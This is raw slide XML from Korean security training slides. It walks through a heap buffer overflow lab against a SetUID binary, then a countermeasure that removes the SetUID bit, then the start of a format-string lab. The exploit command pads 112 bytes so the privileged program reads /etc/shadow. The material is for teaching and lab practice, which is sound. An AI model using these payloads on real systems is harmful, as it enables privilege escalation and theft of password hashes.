                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>stack</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>, root </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>stack</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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아래 그림의 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ASLR </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>stack</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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/Environ/WSL2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>WSL2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>란</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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t>Windows10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>운영체제에서 리눅스 운영체제의 쉘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>시스템을 사용할 수 있도록 지원해주는 기능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windwos10 2004 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>버전</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>을 사용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>Hyper-V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>를 사용하면서 다른 가상화 프로그램을 사용할 수 없음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>stack</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Training/Unit/Sys/10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 10. BOF - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>힙</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/etc/shadow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BOF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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>디렉터리로 이동</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ cd /sec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>2) /sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>가 설정되어 있음을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ ls –l heap</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/sec/heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>소스 파일 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ vim /sec/heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>.c</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/sec/goodfile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일 내용 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ cat goodfile</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/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일 실행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ /sec/heap AAAA</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username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>블록과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>filename </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>블록 간의 거리가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x70(=112) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>바이트임을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="100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ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>힙</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 취약점을 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>을 수정할 수 있음을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ /sec/heap $(python -c 'print "A"*112+"B"') &gt; 1.txt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위의 실행 결과 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ cat 1.txt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B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>라는 파일을 열 수 없었음을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>7) /etc/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일 내용이 출력되도록 공격 수행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ /sec/heap $(python -c 'print "A"*112+"/etc/shadow"') &gt; 2.txt</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>112</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>A’ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>+ 112</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>에 ‘</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>B’</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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8) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>위의 공격 결과 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ cat 2.txt</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:t>1) acheck </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>및 파일명 입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ acheck</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/etc/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일 내용이 출력된 파일 이름 입력</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>위의 예제에서는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>2.txt)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Training/Unit/Sys/10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 10. BOF – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>힙</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>대응</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/sec/heap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SetUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> u-s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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BOF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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>디렉터리로 이동</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># cd /sec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>2) /sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>가 설정되어 있음을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># ls –l heap</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/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>SetUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>설정 해제 및 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> u-s /sec/heap </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># ls –l heap</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ASLR </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>키코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Training/Unit/Sys/11</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 11. Format String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>144</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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(CentOS5.5)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>디렉터리로 이동</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ cd /sec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>소스 파일 및 취약한 부분 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>fmtstring.c</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en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>변수의 값이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>144</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>이면 루트 권한 쉘을 얻을 수 있음을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>ojdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 사용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>disassemble </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>및 취약한 부분 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
